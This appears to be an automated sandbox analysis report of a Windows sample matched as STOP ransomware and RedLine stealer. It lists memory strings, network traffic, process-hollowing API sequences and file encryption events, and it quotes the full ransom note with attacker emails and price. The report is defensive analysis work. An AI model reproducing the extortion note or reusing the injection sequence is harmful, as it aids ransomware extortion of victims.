          Source: mU2p71KMss.exe, 00000007.00000003.2095187541.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095243165.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: mU2p71KMss.exe, 00000007.00000003.2095309712.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095368781.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095426359.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095490468.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000003.2003059893.0000000000906000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.0000000000768000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000003.2166629017.0000000000766000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/.
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/2
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/D
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/K
          Source: mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/a
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.0000000000768000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000003.2166629017.0000000000766000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.0000000000688000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json.7
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json9
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json=
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonSf
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonb
          Source: mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonhy
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonmp
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonpTf
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonqS
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons:$
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonyS
          Source: mU2p71KMss.exe, 00000007.00000003.2089780619.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000764000.00000004.00000020.00020000.00000000.sdmp, _README.txt.7.dr, _README.txt0.7.drString found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloadsVn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,1_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands

          Source: C:\Users\user\AppData\Local\VirtualStore\_README.txt Dropped file: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27 Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshingmail.top Reserve e-mail address to contact us: datarestorehelpyou@airmail.cc Your personal ID: 0864PsawqS8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File moved: C:\Users\user\Desktop\UNKRLCVOHV.mp3
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File deleted: C:\Users\user\Desktop\UNKRLCVOHV.mp3
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File moved: C:\Users\user\Desktop\EIVQSAOTAQ.jpg
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File deleted: C:\Users\user\Desktop\EIVQSAOTAQ.jpg
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File moved: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you. this software will decrypt all your encrypted files. what guarantees you have? you can send one of your encrypted file from your pc and we decrypt it for free. but we can decrypt only 1 file for free. file must not contain valuable information. do not ask assistants from youtube and recovery data sites for help in recovering your data. they can use your free decryption quota and scam you. our contact is emails in this text document only. you can get and look video overview decrypt tool: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27 price of private key and decrypt software is $999. discount 50% available if you contact us first 72 hours, that's price for you is $499. please note that you'll never restore your data without payment. check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours. to get this software you need write on our e-mail: support@freshingmail.top reserve e-mail address
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you. this software will decrypt all your encrypted files. what guarantees you have? you can send one of your encrypted file from your pc and we decrypt it for free. but we can decrypt only 1 file for free. file must not contain valuable information. do not ask assistants from youtube and recovery data sites for help in recovering your data. they can use your free decryption quota and scam you. our contact is emails in this text document only. you can get and look video overview decrypt tool: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27 price of private key and decrypt software is $999. discount 50% available if you contact us first 72 hours, that's price for you is $499. please note that you'll never restore your data without payment. check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours. to get this software you need write on our e-mail: support@freshingmail.top reserve e-mail address

          System Summary

          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 348, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2716, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 5968, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 5524, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 4748, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 4144, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DD0110
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_05DE0110
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044237E1_2_0044237E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004084C01_2_004084C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004344FF1_2_004344FF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0043E5A31_2_0043E5A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040A6601_2_0040A660
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0041E6901_2_0041E690
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004067401_2_00406740
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004027501_2_00402750
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040A7101_2_0040A710
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004087801_2_00408780
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042C8041_2_0042C804
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004068801_2_00406880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004349F31_2_004349F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004069F31_2_004069F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00402B801_2_00402B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00406B801_2_00406B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044ACFF1_2_0044ACFF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042CE511_2_0042CE51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00434E0B1_2_00434E0B
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00406EE01_2_00406EE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00420F301_2_00420F30
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004050571_2_00405057
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042F0101_2_0042F010
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004070E01_2_004070E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004391F61_2_004391F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004352401_2_00435240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004C93431_2_004C9343
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004054471_2_00405447
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004054571_2_00405457
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004495061_2_00449506
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044B5B11_2_0044B5B1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004356751_2_00435675
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004096861_2_00409686
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040F7301_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044D7A11_2_0044D7A1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004819201_2_00481920
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044D9DC1_2_0044D9DC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00449A711_2_00449A71
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00443B401_2_00443B40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409CF91_2_00409CF9
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040DD401_2_0040DD40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00427D6C1_2_00427D6C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040BDC01_2_0040BDC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409DFA1_2_00409DFA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409F761_2_00409F76
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0046BFE01_2_0046BFE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00449FE31_2_00449FE3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE35204_2_05DE3520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE75204_2_05DE7520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0D7F14_2_05E0D7F1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA79A4_2_05DEA79A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEC7604_2_05DEC760
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEE6E04_2_05DEE6E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA6994_2_05DEA699
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2B69F4_2_05E2B69F
